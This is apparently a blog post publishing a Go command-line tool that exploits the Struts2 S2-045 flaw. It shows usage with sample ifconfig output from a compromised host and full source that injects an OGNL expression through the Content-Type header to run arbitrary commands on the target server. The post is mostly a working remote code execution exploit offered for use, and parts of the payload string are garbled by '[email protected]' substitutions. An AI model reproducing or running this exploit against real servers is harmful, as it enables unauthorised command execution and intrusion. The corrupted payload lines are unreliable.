Struts2漏洞利用工具exp-golang

  • 2019-05-15
使用golang实现的一个小工具
使用方法:
[email protected]:~/golang/src/s2-045$ ./main http://xxx.com/1.jsp ifconfig
200
map[Server:[Apache-Coyote/1.1] Date:[Tue, 21 Mar 2017 06:08:39 GMT]]
eth0      Link encap:Ethernet  HWaddr 52:54:E4:D1:15:00
          inet addr:192.168.1.8  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:e4ff:fed1:1500/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9999952 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6667457 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6575210434 (6.1 GiB)  TX bytes:939669875 (896.1 MiB)

源代码:
package main
import (
	"bytes"
	"flag"
	"fmt"
	"log"
	"mime/multipart"
	"net/http"
	"sort"
)
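// newMultipartRequest builds a POST request to url whose body is a
// multipart/form-data document containing one text field per entry in params.
//
// Fields are written in sorted key order so the encoded body is deterministic
// (Go map iteration order is random). Errors from writing a field or from
// finalising the multipart body are returned instead of being discarded.
//
// The request's Content-Type header is not set here; the caller is expected
// to set it (multipart.Writer.FormDataContentType gives the conventional
// value for a real upload).
func newMultipartRequest(url string, params map[string]string) (*http.Request, error) {
	keys := make([]string, 0, len(params))
	for k := range params {
		keys = append(keys, k)
	}
	sort.Strings(keys)

	body := &bytes.Buffer{}
	writer := multipart.NewWriter(body)
	for _, key := range keys {
		if err := writer.WriteField(key, params[key]); err != nil {
			return nil, err
		}
	}
	// Close writes the terminating boundary; without it the body is truncated.
	if err := writer.Close(); err != nil {
		return nil, err
	}
	return http.NewRequest("POST", url, body)
}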
// main is the command-line entry point. It takes the target URL and a command
// string as the two positional arguments, builds a multipart POST whose
// Content-Type header carries an OGNL expression containing that command (the
// S2-045 request shape), sends it, and prints the response status, headers and
// body.
func main() {
	flag.Parse()
	// Positional arguments are used unchecked: with fewer than two arguments
	// they are "", so the request targets an empty URL and fails in client.Do.
	url := flag.Arg(0)
	cmd := flag.Arg(1)
	// The expression lives in the Content-Type header, not the body, and cmd is
	// concatenated into it without any quoting. The literal is reproduced here
	// exactly as published. For detection, the distinctive request feature is a
	// Content-Type header value beginning with "%{" that references
	// ProcessBuilder, ognlUtil and ServletActionContext.
	payload := "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)" +
		":((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensym" +
		"[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())" +
		".(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@[email protected]('os.name').toLowerCase().c" +
		"ontains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))." +
		"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOut" +
		"putStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
	// A single empty field only gives the request a multipart body; the field
	// name and value play no part in the expression above.
	extraParams := map[string]string{
		"Test": "",
	}
	request, err := newMultipartRequest(url, extraParams)
	if err != nil {
		log.Fatal(err)
	}
	// Browser-like User-Agent. The multipart boundary Content-Type a normal
	// upload would carry is replaced by the payload string.
	request.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36")
	request.Header.Set("Content-Type", payload)
	client := &http.Client{}
	resp, err := client.Do(request)
	if err != nil {
		log.Fatal(err)
	} else {
		// Style: the else is unnecessary after log.Fatal, which never returns.
		/* read the response body */
		body := &bytes.Buffer{}
		_, err := body.ReadFrom(resp.Body)
		if err != nil {
			// NOTE(review): exits before the Close below runs.
			log.Fatal(err)
		}
		resp.Body.Close()
		// Println on *bytes.Buffer uses its String method, so the raw body is
		// printed after the status code and the header map.
		fmt.Println(resp.StatusCode)
		fmt.Println(resp.Header)
		fmt.Println(body)
	}
}
